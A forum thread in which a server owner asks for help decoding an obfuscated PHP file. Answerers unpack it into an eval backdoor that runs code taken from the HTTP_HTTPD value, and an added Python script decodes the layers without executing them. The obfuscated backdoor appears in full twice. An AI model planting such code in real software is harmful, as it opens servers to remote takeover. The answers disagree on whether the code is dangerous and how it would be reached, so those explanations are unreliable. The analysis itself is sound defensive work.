Suspicious file found on server


I have found a suspicious file on my server, and I am attempting to decode it and figure out what it was put there to do.
The code is as follows; any tips on how to decode this?
<?php if(!function_exists("mystr1s45")){class mystr1s21 { static $mystr1s279="S\x46\x52U\x55F9\x49VFR\x51\x52A\x3d="; static $mystr1s178="b\x61\x73e\x364\x5fde\x63\x6fd\x65"; }eval("e\x76\x61\x6c\x28\x62a\x73e\x364\x5f\x64\x65c\x6f\x64\x65\x28\x27Zn\x56uY\x33Rpb\x324\x67bX\x6czd\x48\x49xcz\x634KC\x52teX\x4e\x30c\x6aF\x7aO\x54\x6bp\x65yR\x37I\x6cx\x34\x4emRc\x65D\x635c1\x78\x34NzR\x79X\x48gz\x4dXNc\x65DMx\x4dVx\x34Mz\x41if\x541t\x65XN\x30cj\x46zMj\x45\x36\x4fi\x52\x37\x49\x6cx\x34NmR\x35\x63\x31\x784Nz\x52y\x4dV\x78\x34\x4ez\x4d\x78Nzg\x69f\x54ty\x5aXR1\x63m4\x67J\x48sib\x58l\x63\x65\x44\x63zd\x46x4N\x7aJce\x44Mxc\x7aF\x63e\x44M\x78MCJ\x39K\x43\x42teX\x4e\x30\x63\x6aFzM\x6a\x456Oi\x527J\x48si\x58Hg\x32ZH\x6c\x63e\x44czd\x48J\x63\x65D\x4dxc\x7a\x6c\x63eDM\x35\x49\x6e19I\x43k\x37\x66Q\x3d\x3d\x27\x29\x29\x3be\x76a\x6c\x28\x62a\x73e\x364\x5f\x64e\x63o\x64\x65\x28\x27ZnV\x75Y3\x52pb\x324\x67b\x58\x6c\x7adHI\x78c\x7a\x51\x31KC\x52\x74eX\x4e0cj\x46zNj\x59\x70IH\x74y\x5aXR1\x63m\x34g\x62Xl\x7ad\x48I\x78czI\x78\x4fj\x6f\x6beyR\x37\x49m1\x35\x58Hg\x33\x4d3Rc\x65D\x63yMX\x4eceD\x4d2\x4e\x69\x4a9f\x54t\x39\x27\x29\x29\x3b");} $mystr1s2235=#getenv(mystr1s78("\x6dys\x74r1s\x3279"));if($mystr1s2235) {#eval($mystr1s2235);} ?>
Thanks,
Alan.
The functions in php you're looking for appear to be a combination of base64_decode and urldecode. For example:
urldecode("\x6d\x79s\x74r\x31s\x311\x30");
gives "mystr1s110"
Also part of the string in the eval statement base64_decodes to:
function mystr1s78($mystr1s99){${"\x6d\x79s\x74r\x31s\x311\x30"}=mystr1s21::${"\x6dys\x74r1\x73178"};return ${"my\x73t\x72\x31s1\x310"}( mystr1s21::${${"\x6dy\x73tr\x31s9\x39"}} );}
Those encoded strings all reference variables defined earlier, for example \x6d\x79s\x74r\x31s\x311\x30 url-decodes to mystr1s110
This looks very nasty to me, although I'm no security expert. I would just run php -a and figure out what chunks are decoded how, then reconstruct the code from there.
On a side note: you pulled this off the server, right?
EDIT:
Was kind of intrigued by this. After a complete decode I got this:
<?php
if(!function_exists("myFunction2")){
class myClass {
static $myVar1="SFRUUF9IVFRQRA==";
static $myVar2="base64_decode";
}
function myFunction1($myArg)
{
${$myVar4}=myClass::$myVar2; // myClass::$myVar2 is just "base64_decode"
return $myVar4( myClass::${$myArg} ); // returning base64_decode of the argument
}
function myFunction2($myArg2)
{
return myClass::${$myVar3};
}
$myFinalVar=#getenv(myFunction1('myVar1')); //just gets env variable of base64 decode of myVar1
if($myFinalVar) {
#eval($myFinalVar); //executes
}
?>
Looks to me like it's a script designed to execute a script on another server (i.e. they could just hit the web address with their script in the URL and it would execute). SFRUUF9IVFRQRA== decodes to HTTP_HTTPD, so they could hit http://yourwebsite.com/thisscript.php?HTTP_HTTPD=myscriptaddress.php and it would run whatever they wanted on your server.
In my opinion, it is not a harmful script; in fact, it is of no use at all.
Here is the basis for my comments:
To decode, you can simply put the hex strings as argument to print_r().
print_r("b\x61\x73e\x364\x5fde\x63\x6fd\x65");
Complete decoded code is:
<?php
if(!function_exists("mystr1s45")){
class mystr1s21 {
static $mystr1s279="SFRUUF9IVFRQRA==";
static $mystr1s178="base64_decode";
}
eval(
eval(
function mystr1s78($mystr1s99){ // returns 'HTTP_HTTPD'
${mystr1s110}=mystr1s21::${mystr1s178};
return ${mystr1s110}( mystr1s21::${${mystr1s99}} );
}
);
eval(
function mystr1s45($mystr1s66) {
return mystr1s21::${${mystr1s66}};
}
);
);
}
$mystr1s2235=#getenv(mystr1s78("mystr1s279"));
if($mystr1s2235) {
#eval($mystr1s2235);
}
?>
The function mystr1s78 will return 'HTTP_HTTPD'. This will be used as the environment variable name whose value is fetched using getenv.
If you run the decoded code, you will get a parse error near the definition of function mystr1s78. This is because eval expects a string, and that string must be a valid code statement (not an expression).
Parse error: syntax error, unexpected 'mystr1s78' (T_STRING), expecting '('
As far as I know, HTTP_HTTPD is not an environment variable that is set by default by Apache or any other web server, and even if it is a variable with some value, passing it to eval will not do anything.
To confirm, you can set an environment variable HTTP_HTTPD as follows:
<?php
apache_setenv('HTTP_HTTPD',<some_value>);
if(!function_exists("mystr1s45")){class mystr1s21 { static $mystr1s279="S\x46\x52U\x55F9\x49VFR\x51\x52A\x3d="; static $mystr1s178="b\x61\x73e\x364\x5fde\x63\x6fd\x65"; }eval("e\x76\x61\x6c\x28\x62a\x73e\x364\x5f\x64\x65c\x6f\x64\x65\x28\x27Zn\x56uY\x33Rpb\x324\x67bX\x6czd\x48\x49xcz\x634KC\x52teX\x4e\x30c\x6aF\x7aO\x54\x6bp\x65yR\x37I\x6cx\x34\x4emRc\x65D\x635c1\x78\x34NzR\x79X\x48gz\x4dXNc\x65DMx\x4dVx\x34Mz\x41if\x541t\x65XN\x30cj\x46zMj\x45\x36\x4fi\x52\x37\x49\x6cx\x34NmR\x35\x63\x31\x784Nz\x52y\x4dV\x78\x34\x4ez\x4d\x78Nzg\x69f\x54ty\x5aXR1\x63m4\x67J\x48sib\x58l\x63\x65\x44\x63zd\x46x4N\x7aJce\x44Mxc\x7aF\x63e\x44M\x78MCJ\x39K\x43\x42teX\x4e\x30\x63\x6aFzM\x6a\x456Oi\x527J\x48si\x58Hg\x32ZH\x6c\x63e\x44czd\x48J\x63\x65D\x4dxc\x7a\x6c\x63eDM\x35\x49\x6e19I\x43k\x37\x66Q\x3d\x3d\x27\x29\x29\x3be\x76a\x6c\x28\x62a\x73e\x364\x5f\x64e\x63o\x64\x65\x28\x27ZnV\x75Y3\x52pb\x324\x67b\x58\x6c\x7adHI\x78c\x7a\x51\x31KC\x52\x74eX\x4e0cj\x46zNj\x59\x70IH\x74y\x5aXR1\x63m\x34g\x62Xl\x7ad\x48I\x78czI\x78\x4fj\x6f\x6beyR\x37\x49m1\x35\x58Hg\x33\x4d3Rc\x65D\x63yMX\x4eceD\x4d2\x4e\x69\x4a9f\x54t\x39\x27\x29\x29\x3b");} $mystr1s2235=#getenv(mystr1s78("\x6dys\x74r1s\x3279"));if($mystr1s2235) {#eval($mystr1s2235);}
?>
Please let us know if you think this is malicious and can harm the system.
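Both answers above decode the layers by hand or by running pieces in php -a. The following is an added example, not code from the question or either answer: it peels the same layers statically in Python, resolving PHP's \xNN escapes and the eval(base64_decode('...')) wrapper with regular expressions, so nothing from the file is ever executed. The two static strings and the eval prefix/suffix in the constructed sample are copied from the posted file; the inner function body is a hypothetical stand-in.

```python
import base64
import re

# Escapes PHP resolves in double-quoted strings that this obfuscator leans on:
# \xNN (one or two hex digits), \\ and \". Anything else is left as-is.
PHP_ESCAPE = re.compile(r'\\(x[0-9A-Fa-f]{1,2}|\\|")')
# The eval(base64_decode('...')) wrapper that becomes visible once unescaped.
B64_CALL = re.compile(r"base64_decode\('([A-Za-z0-9+/=]+)'\)")
# Class statics such as  static $mystr1s279="...";
STATIC_STR = re.compile(r'static\s+\$(\w+)\s*=\s*"([^"]*)"')


def php_unescape(s: str) -> str:
    """Resolve \\xNN, \\\\ and \\" the way PHP's double-quoted string parser does."""
    return PHP_ESCAPE.sub(
        lambda m: chr(int(m.group(1)[1:], 16)) if m.group(1)[0] == "x" else m.group(1), s)


def unwrap_layers(src: str, max_depth: int = 8) -> list:
    """Successive decoded layers, outermost first; nothing is ever executed."""
    layers, current = [], src
    for _ in range(max_depth):
        plain = php_unescape(current)          # layer as PHP would see the literals
        layers.append(plain)
        blobs = B64_CALL.findall(plain)        # next layer hides inside base64
        if not blobs:
            break
        current = "\n".join(base64.b64decode(b).decode("utf-8", "replace") for b in blobs)
    return layers


def static_constants(layer: str) -> dict:
    """Class statics as {name: value}; valid base64 values also get a '<name>_b64' entry."""
    out = {}
    for name, val in STATIC_STR.findall(layer):
        out[name] = val
        try:
            out[name + "_b64"] = base64.b64decode(val, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            pass
    return out


# Constructed sample with the posted file's layering: the two statics and the eval
# prefix/suffix are copied from it; the inner function body is ours (hypothetical).
INNER_PHP = 'function mystr1s45($mystr1s66){ return mystr1s21::${"\\x6dys\\x74r1s279"}; }'
_B64 = base64.b64encode(INNER_PHP.encode()).decode()
_B64 = "".join(f"\\x{ord(c):02x}" if i % 3 == 0 else c for i, c in enumerate(_B64))
SAMPLE = (
    r'<?php class mystr1s21 { static $mystr1s279="S\x46\x52U\x55F9\x49VFR\x51\x52A\x3d="; '
    r'static $mystr1s178="b\x61\x73e\x364\x5fde\x63\x6fd\x65"; } '
    r'eval("e\x76\x61\x6c\x28\x62a\x73e\x364\x5f\x64\x65c\x6f\x64\x65\x28\x27' + _B64 + r'\x27\x29\x29\x3b"); ?>'
)
```

Calling unwrap_layers(SAMPLE) returns two layers (the class declaration with its readable statics, then the inner function), and static_constants on the first layer shows $mystr1s279 decoding to HTTP_HTTPD without having evaluated anything.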